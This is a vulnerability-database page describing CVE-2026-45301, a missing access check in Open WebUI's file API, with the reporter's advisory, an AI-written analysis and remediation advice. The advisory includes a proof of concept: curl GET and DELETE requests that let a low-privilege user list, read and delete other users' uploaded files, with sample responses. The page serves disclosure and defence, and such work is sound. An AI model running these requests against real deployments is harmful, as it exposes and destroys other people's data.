Skip to main content

Open WebUI CVE-2026-45301

HIGH
Improper Access Control (CWE-284)
2026-05-14 https://github.com/open-webui/open-webui GHSA-r8wh-8m7r-fh33
8.1
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
8.1 HIGH
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
None

Lifecycle Timeline

3
Source Code Evidence Fetched
May 14, 2026 - 21:17 vuln.today
Analysis Generated
May 14, 2026 - 21:17 vuln.today
CVE Published
May 14, 2026 - 20:15 nvd
HIGH 8.1

DescriptionGitHub Advisory

Summary

A missing permission check in all files related API endpoints allows any authenticated user to list, access and delete every file uploaded by every user to the platform.

Details

All files/ related endpoints lack permission checks.

Listing all files

For example, let's see how file listing is implemented: https://github.com/open-webui/open-webui/blob/e2b7296786053dfc77f6ae0205a1b195e05a712c/backend/apps/webui/routers/files.py#L107-L110 https://github.com/open-webui/open-webui/blob/e2b7296786053dfc77f6ae0205a1b195e05a712c/backend/apps/webui/models/files.py#L26 Notice the endpoint depends only on an authenticated user check, no file filtering is done to match the uploaded files' user_id to the requesting user.

This problem repeats itself throughout the various route implementations, allowing any user to perform actions on any file. Some note worthy functions:

Accessing the content of any file

https://github.com/open-webui/open-webui/blob/e2b7296786053dfc77f6ae0205a1b195e05a712c/backend/apps/webui/routers/files.py#L173-L193

Deleting any file

https://github.com/open-webui/open-webui/blob/e2b7296786053dfc77f6ae0205a1b195e05a712c/backend/apps/webui/routers/files.py#L224-L241

PoC

Configuration
  1. I ran a clean install of the latest version using one of the docker one-liners on an Ubuntu desktop:

docker run -d -p 3000:8080 -v ollama:/root/.ollama -v open-webui:/app/backend/data --name open-webui --restart always ghcr.io/open-webui/open-webui:ollama

  1. I created an admin user
  2. I created a second user to act as the threat actor with no elevated permissions
  3. Admin user uploaded test.txt in a conversation with model
  4. Admin user uploaded mydeepest_secret.docx in a conversation with model
Listing files uploaded by other users
  1. Login to threat actor
  2. Perform a GET request to /api/v1/files/
sh
curl -X 'GET' \
  'http://localhost:3000/api/v1/files/' \
  -H 'accept: application/json'
json
[
  {
    "id": "b9733e9c-0714-4425-8915-d0361bf66dfc",
    "user_id": "c0c16e7a-6f81-4863-8b71-e56e2e389cf1",
    "filename": "b9733e9c-0714-4425-8915-d0361bf66dfc_test.txt",
    "meta": {
      "name": "test.txt",
      "content_type": "text/plain",
      "size": 4,
      "path": "/app/backend/data/uploads/b9733e9c-0714-4425-8915-d0361bf66dfc_test.txt"
    },
    "created_at": 1724709202
  },
  {
    "id": "8f058e18-fec1-4b9f-bb4e-c17f39d03c98",
    "user_id": "c0c16e7a-6f81-4863-8b71-e56e2e389cf1",
    "filename": "8f058e18-fec1-4b9f-bb4e-c17f39d03c98_mydeepest_secret.docx",
    "meta": {
      "name": "mydeepest_secret.docx",
      "content_type": "application/vnd.openxmlformats-officedocument.wordprocessingml.document",
      "size": 6485,
      "path": "/app/backend/data/uploads/8f058e18-fec1-4b9f-bb4e-c17f39d03c98_mydeepest_secret.docx"
    },
    "created_at": 1724710236
  }
]
Accessing other users' file content
  1. Login to threat actor
  2. Perform a GET request to /api/v1/files/{id}/content
sh
curl -X 'GET' \
  'http://localhost:3000/api/v1/files/b9733e9c-0714-4425-8915-d0361bf66dfc/content' \
  -H 'accept: application/json'
wow
Deleting another user's uploaded file
  1. Login to threat actor
  2. Perform a DELETE request to /api/v1/files/{id}
sh
curl -X 'DELETE' \
  'http://localhost:3000/api/v1/files/8f058e18-fec1-4b9f-bb4e-c17f39d03c98' \
  -H 'accept: application/json'
json
{
  "message": "File deleted successfully"
}
  1. We will verify this action by furthur listing all files as mentioned above:
json
[
  {
    "id": "b9733e9c-0714-4425-8915-d0361bf66dfc",
    "user_id": "c0c16e7a-6f81-4863-8b71-e56e2e389cf1",
    "filename": "b9733e9c-0714-4425-8915-d0361bf66dfc_test.txt",
    "meta": {
      "name": "test.txt",
      "content_type": "text/plain",
      "size": 4,
      "path": "/app/backend/data/uploads/b9733e9c-0714-4425-8915-d0361bf66dfc_test.txt"
    },
    "created_at": 1724709202
  }
]

Impact

Having access to user uploaded files, regardless of ownership or permission level, breaks the confidentiality of sensitive data stored by users. Furthermore, the ability to delete other user's uploaded files disrupts the integrity of the system.

Personal Notice

In case this submission does get recognized and numbered as a CVE I'd perfer to be credited by my full name - Yuval Gal, instead of my GitHub handle.

Thanks in advance and have a good week (:

Credits

This vulnerability was reported by Yuval Gal (GitHub: @vi11ain).

AnalysisAI

Horizontal privilege escalation in Open WebUI versions through 0.3.15 allows any authenticated user to enumerate, read, and delete all files uploaded by all other users via missing authorization checks in the files API endpoints. The vulnerability requires only low-privilege authenticated access to the web interface and has publicly available exploit code with a detailed proof-of-concept demonstrating how attackers can list all uploaded files regardless of owner, retrieve file contents, and delete arbitrary user files. Organizations running multi-user Open WebUI deployments face immediate risk of data breach and integrity loss, as file upload features in conversational AI platforms commonly handle sensitive documents and internal communications.

Technical ContextAI

Open WebUI is a Python-based web interface for large language model platforms like Ollama, distributed via PyPI (pkg:pip/open-webui) and deployed commonly via Docker containers. The vulnerability stems from insecure direct object reference (IDOR) flaws classified under CWE-284 (Improper Access Control) in the FastAPI-based backend router implementation. The /backend/apps/webui/routers/files.py endpoints (GET /api/v1/files/, GET /api/v1/files/{id}/content, DELETE /api/v1/files/{id}) authenticate users via session tokens but fail to verify that the authenticated user owns or has permission to access the requested file resource. The database model in files.py retrieves file records without filtering by user_id, creating a classic broken object-level authorization flaw. File metadata includes full filesystem paths in the JSON response, further exposing internal storage architecture. This architectural flaw affects all file-handling endpoints uniformly, indicating systemic authorization logic failure rather than isolated coding errors.

RemediationAI

Upgrade immediately to Open WebUI version 0.3.16 or later, which includes authorization checks in the file API endpoints per the vendor advisory at https://github.com/open-webui/open-webui/security/advisories/GHSA-r8wh-8m7r-fh33. For Docker deployments, pull the latest image and restart containers with version tags 0.3.16+. For PyPI installations, run 'pip install --upgrade open-webui>=0.3.16' and restart the application service. If immediate patching is not feasible, implement network-level access controls to restrict the /api/v1/files/ endpoint paths to trusted IP ranges only via reverse proxy rules (nginx/Apache/Traefik), though this provides incomplete protection and may break legitimate functionality. As a temporary measure, disable file upload features entirely in the application configuration if business requirements permit, though this severely limits conversational AI utility. Consider implementing application-layer firewall rules to log and alert on suspicious file enumeration patterns (rapid sequential requests to /api/v1/files/{id}/content with varying UUIDs). After patching, conduct forensic review of application logs to identify potential historical exploitation-search for GET requests to /api/v1/files/ and /api/v1/files/{id}/content from users accessing file IDs they did not create, and DELETE operations against files owned by other user_id values. No known workaround fully mitigates this vulnerability without upgrading.

More in Docker

View all
CVE-2024-55964 CRITICAL POC
9.8 Mar 26

An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl

CVE-2019-5736 HIGH POC
8.6 Feb 11

runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac

CVE-2023-32077 HIGH POC
7.5 Aug 24

Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2023-5815 HIGH POC
8.1 Nov 22

The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post

CVE-2014-9357 CRITICAL
10.0 Dec 16

Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build

CVE-2026-34156 CRITICAL POC
9.9 Mar 30

Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l

CVE-2019-15752 HIGH POC
7.8 Aug 28

Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c

CVE-2025-34221 CRITICAL POC
10.0 Sep 29

Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2

CVE-2024-23054 CRITICAL POC
9.8 Feb 05

An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du

CVE-2025-23211 CRITICAL POC
9.9 Jan 28

Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve

CVE-2026-46339 CRITICAL POC
10.0 May 19

Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at

Share

CVE-2026-45301 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy